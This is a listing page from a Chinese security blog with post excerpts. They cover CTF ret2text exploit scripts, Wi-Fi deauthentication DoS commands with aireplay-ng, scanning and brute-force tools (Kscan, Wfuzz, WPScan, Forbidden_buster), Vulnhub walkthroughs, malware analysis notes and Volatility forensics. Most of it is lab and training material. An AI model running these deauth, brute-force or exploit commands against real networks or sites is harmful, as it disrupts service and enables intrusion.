avatar
文章
319
标签
29
分类
0

Home
Archives
Tags
Categories
List
  • Music
  • Movie
Link
About
The Blog of Monoceros406
搜索
Home
Archives
Tags
Categories
List
  • Music
  • Movie
Link
About

The Blog of Monoceros406

PWN入门-ret2text做题
发表于2024-01-26|PWN
PWN入门-ret2text做题[SWPUCTF 2021 新生赛]gift_pwn1checksec 文件名 开启堆栈不可执行保护(NX),不会把堆栈上数据当成指令来执行。 没有canary保护,可利用栈溢出来修改eip。 PIE地址随机花没有开启。 12345from pwn import *p=remote('node4.anna.nssctf.cn',28708)payload=b'a'*0x10+b'a'*8+p64(0x4005B6) #32位+4 64位+8p.sendline(payload)p.interactive() [CISCN 2019华北]PWN1123456from pwn import *context(log_level='debug',arch='amd64',os='linux')p=process('./attachment')payload=b'a'*0x2c+p64(0x ...
对无线路由发起DoS攻击
发表于2024-01-26|渗透测试
对无线路由发起DoS攻击先断开连接,查看附近所有WiFi: 1airodump-ng wlan0 记录目标MAC地址,尝试攻击,“-0 0”表示无限次数攻击: 1aireplay-ng -0 0 -a MAC地址 wlan0 很有可能本机与目标路由不在同一信道,尝试更改信道: 1iwconfig wlan0 channel 目标信道 以上流程适用于攻击该无线路由,以下方法为针对目标终端。 查看都有哪些终端连接到该无线路由: 1airodump-ng --bssid 无线路由MAC地址 wlan0 嗅探到目标终端的MAC地址后,再次确认是否在同一信道,尝试进行攻击: 1aireply-ng -0 0 -a 无线路由MAC地址 -c 目标终端MAC地址 wlan0
Kscan初探
发表于2024-01-26|渗透测试
Kscan初探端口扫描: 1kscan -t 192.168.217.1/24 存活网段探测: 1kscan --spy FOFA检索: 1kscan -f 'title="后台管理"' --fofa-size 15 暴力破解: 1kscan -t 127.0.0.1 --hydra CDN识别: 1kscan -t www.iywaobt.cn
Forbidden_buster初探
发表于2024-01-26|渗透测试
Forbidden_buster初探基本方法利用各种技术方法和Header测试绕过401、403访问控制限制。 1forbidden_buster -u http://example.com 常用参数 -u | –url 待测Web应用程序完整URL路径 -m | –method 测试方法 默认GET -H | –header 添加一个自定义Header -d | –data 向请求体中添加数据 支持JSON -p | –proxy 使用代理 –include-api API模糊测试 –include-unicode Unicode模糊测试 速度慢 –include-user-agent User-Agent模糊测试 速度慢 进阶方法1forbidden_buster --url "https://example.com/api/v1/secret" --method POST --header "Authorization: Bearer XXX" --data '{\"key\":\ ...
恶意代码分析实战
发表于2024-01-22|恶意代码
恶意代码分析实战静态分析查看可执行文件/DLL文件编译时间:PETool查看PE文件头,找到_IMAGE_NT_HEADERS.FileHeader.TimeDateStamp。 当导入表存在WS2_32.dll,则有联网行为。ADVAPI32.dll中存在创建服务和提权API。ole32.dll可创建COM实例。 通用脱壳机linxerUnpacker可脱FSG壳。 判断PE文件为EXE还是DLL:PETools文件头->特征值,看DLL复选框是否勾选。 恶意代码检测Vmware原理:in(0xED)指令与魔术字符串“VMXH”进行检测。另一种遍历HKLM\SYSTEM\CurrentControlSet\Control\Device以查找vmware值。也有其他各种老六行为。 CreateToolhelp32Snapshot进程、线程拍摄快照。 动态分析运行DLL: 1rundll32 *.dll,导出表函数名 用RegShot记录注册表操作。注册表创建服务路径:HKLM\SYSTEM\ControlSet001\Services\服务名,重要参数:ImagePa ...
靶机渗透实战基础-Vulnhub-NullByte
发表于2024-01-19|渗透测试
靶机渗透实战基础-Vulnhub-NullByte主机发现&端口扫描emm…没给IP,得自己扫: 1sudo arp-scan -l 或另一种方法: 1nmap -sn 192.168.2.0/24 再或另一种方法: 1sudo netdiscover -i wlan0 -r 192.168.2.0/24 发现NullByte主机IP为192.168.2.183。 分别探测该主机TCP和UDP端口服务: 12nmap --min-rate 10000 -sT -p- 192.168.2.183sudo nmap --min-rate 10000 -sU -p- 192.168.2.183 结果分别如下: 1234567891011PORT STATE SERVICE80/tcp open http111/tcp open rpcbind777/tcp open multiling-http58567/tcp open unknownPORT STATE SERVICE111/udp open rpcbind5353/udp ...
靶机渗透实战基础-Vulnhub-Prime_1
发表于2024-01-19|渗透测试
靶机渗透实战基础-Vulnhub-Prime:1主机发现&端口扫描攻击主机IP:192.168.2.130,C段扫描: 1nmap -sP 192.168.2.1/24 发现目标主机IP地址为:192.168.2.198。 进行进攻性扫描: 1nmap -A 192.168.2.198 发现两个端口开放: 12345678910PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)| 256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)|_ 256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)80/tcp open ht ...
Wfuzz基础操作
发表于2024-01-19|渗透测试
Wfuzz基础操作爆后台文件: 1wfuzz -w wordlist URL/FUZZ.php 其中wordlist填字典目录,URL即为具体连接,关键字FUZZ为爆破点。 爆后台目录: 1wfuzz -w wordlist URL/FUZZ 爆URL参数: 1wfuzz -z range,000-99 url/xxx.php?id=FUZZ 其中range为id的取值范围。 指定cookie或session: 1wfuzz -z range,000-999 -b session=session -b cookie=cookie url/xxx.php?id=FUZZ 递归测试,在已找出的目录再递归一次: 1wfuzz -z list,"admin-login.php-test.php" -R 1 URL/FUZZ POST双传参: 1wfuzz -w /usr/share/wfuzz/wordlist/general/mima.txt -w /usr/share/wfuzz/wordlist/general/mima.txt -d "usern ...
WPScan常用方法
发表于2024-01-19|渗透测试
WPScan常用方法参数 –url|-u 扫描指定URL或域名。 –force|-f 如果正在WordPress强制WPScan不检查。 –enumerate|-e [option(s)] 信息枚举 u 用户名id 1-10 u[10-20] 指定用户名id 10-20 p 插件程序 vp 仅漏洞插件程序 ap 所有插件程序(慢) tt timthumbs t 主题 vt 仅漏洞主题 at 所有主题(慢) 常见用法123wpscan -u 192.168.41.130 #收集基本信息wpscan -u 192.168.41.130 -e u vp #列出用户名列表、漏洞插件wpscan -u 192.168.41.130 -e u --wordlist /root/wordlist.txt #用户名密码爆破
Volatility初探
发表于2024-01-19|取证
Volatility初探寻找profile: 1vol -f mem.vmem imageinfo 查看进程: 1vol -f mem.vmem --profile=XXX pslist 进程转储: 1vol -f mem.vmem --profile=XXX memdump -p 2012 -D ./ 查看用户密码: 1vol -f mem.vmem --profile=XXX hashdump 查看cmd进程: 1vol -f mem.vmem --profile=XXX cmdscan 查找flag关键词: 1vol -f mem.vmem --profile=XXX filescan | grep flag 文件转储: 1vol -f mem.vmem --profile=XXX dumpfiles -Q 0X00000123456 -D ./ 查看Windows窗口程序,显示10行内容: 1vol -f mem.vmem --profile=XXX windows | grep flag -A 10 从注册表中提取LSA密钥信息: 1vol -f mem.vm ...
1…202122…32
avatar
Monoceros406
Windows系统安全爱好者
文章
319
标签
29
分类
0
Follow Me
公告
哪里排版出锅了请告诉我QwQ QQ:1295625063
最新文章
Qt6开发入门-常用控件简介2025-05-11
Qt6开发入门-Qt框架综述2025-05-11
C++后端开发入门-环境配置与多线程编程2025-05-05
Qt6开发入门-环境配置与入门2025-05-05
差分隐私实践入门2025-05-03
标签
Win驱动开发 密码学 Python IoT 前端开发 PWN 漏洞复现 Misc 渗透测试 恶意代码 解题报告 AWD WinAPI GUI开发 算法 移动安全 后端开发 沙盒逃逸 逆向工程 取证 Web3 UEFI Web 编程语言 Win系统调试 OpenSSL 数学建模 其他 Win内核安全
归档
  • 五月 20255
  • 十二月 202413
  • 十一月 202412
  • 十月 202420
  • 九月 20243
  • 八月 20248
  • 七月 202413
  • 六月 20249
网站资讯
文章数目 :
319
已运行时间 :
本站访客数 :
本站总访问量 :
最后更新时间 :
©2020 - 2025 By Monoceros406
框架 Hexo|主题 Butterfly